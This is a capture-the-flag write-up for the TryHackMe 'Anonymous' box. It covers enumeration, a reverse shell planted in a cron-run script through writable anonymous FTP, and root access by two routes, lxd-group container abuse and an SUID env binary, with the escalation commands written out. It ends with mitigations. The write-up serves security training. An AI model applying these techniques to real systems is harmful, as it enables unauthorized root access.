Anonymous Write-up
Description
Anonymous is a boot2root CTF on TryHackMe. It has medium difficulty. Initial access has been accomplished through injecting a reverse shell into a script on the FTP server. This script was run by a cronjob. After that privilege escalation to root was done via a misconfigured SUID binary.
Enumeration
First of all we start a Nmap scan against the target.
sudo nmap 10.10.237.17 -sC -sV -p- -O -oN nmap/all
The SMB share can be enumerated with the smbclient command. First of all the shares are listed.
smbclient -L //10.10.237.17/
In the next step the contents of the share was downloaded to the attacker machine. But these images did not contain any valuable information.
smbclient //10.10.237.17/<share_name>/
On the FTP server anonymous login is allowed.
The FTP server contains a scripts folder. We have full access to this folder. Inside this folder there are three files. To be able to analyze these files, these files are downloaded to the attacker machine.
The to_do.txt file does not contain any valuable information.
But the clean.sh and the removed_files.log do.
Initial Access
In the next step a reverse shell was placed into clean.sh.
After that the file was uploaded to the FTP server.
Next a listener was started with pwncat. After waiting for a while, the box has connected to the listener.
Privilege Escalation
In the picture above, it can be clearly seen that the user namelessone is part of the “lxd” group. This can be abused to gain a root shell. This website describes how this can be accomplished. First of all a container will be created on the attacker machine by running the following commands:
sudo apt updatesudo apt install -y golang-go debootstrap rsync gpg squashfs-toolsgo get -d -v github.com/lxc/distrobuildercd $HOME/go/src/github.com/lxc/distrobuildermakecdmkdir -p $HOME/ContainerImages/alpine/cd $HOME/ContainerImages/alpine/wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yamlsudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
Finally these files should be inside ~/ContainerImages/alpine:
Now these files have to be uploaded to the target. This can be easily accomplished with pwncat. After pressing CTR + D the following commands will upload the lxd.tar.xz and the rootfs.squashfs files inside the tmp folder of the target.
upload /home/kali/ContainerImages/alpine/lxd.tar.xz /tmp
upload /home/kali/ContainerImages/alpine/rootfs.squashfs /tmp
After that press CTR + D again to get the shell as namelessone.
Now the container has to build on the victim machine with the following commands.
cd /tmplxc image import lxd.tar.xz rootfs.squashfs — alias alpinelxd initlxc init alpine privesc -c security.privileged=truelxc config device add privesc host-root disk source\=/ path\=/mnt/root recursive\=true
Finally the container will be executed.
lxc start privesclxc exec privesc /bin/sh
Unfortunately I was not able to get the root flag with this way. So another privilege escalation had to be found. To find another attack vector the LinEnum script has been used. This script is located /opt/LinEnum/LinEnum.sh on my machine. It can be easily uploaded to the victim with pwncat.
upload /opt/LinEnum/LinEnum.sh /tmp/LinEnum.sh
Now it can be run from the /tmp directory.
bash LinEnum.shThis script will also output binaries with the SUID bit set. Fortunately the env binary has the SUID bit set.
This can be used to elevate privileges to root.
env /bin/sh -p
Mitigation
The FTP server should not allow anonymous login. If anonymous login is needed, then the anonymous user should not have access to sensitive information. Also an anonymous user should not have the privilege to write into an FTP folder. Furthermore namelessone should not be part of the lxd group, if not needed. Also the misconfiguration of the env binary should be fixed.
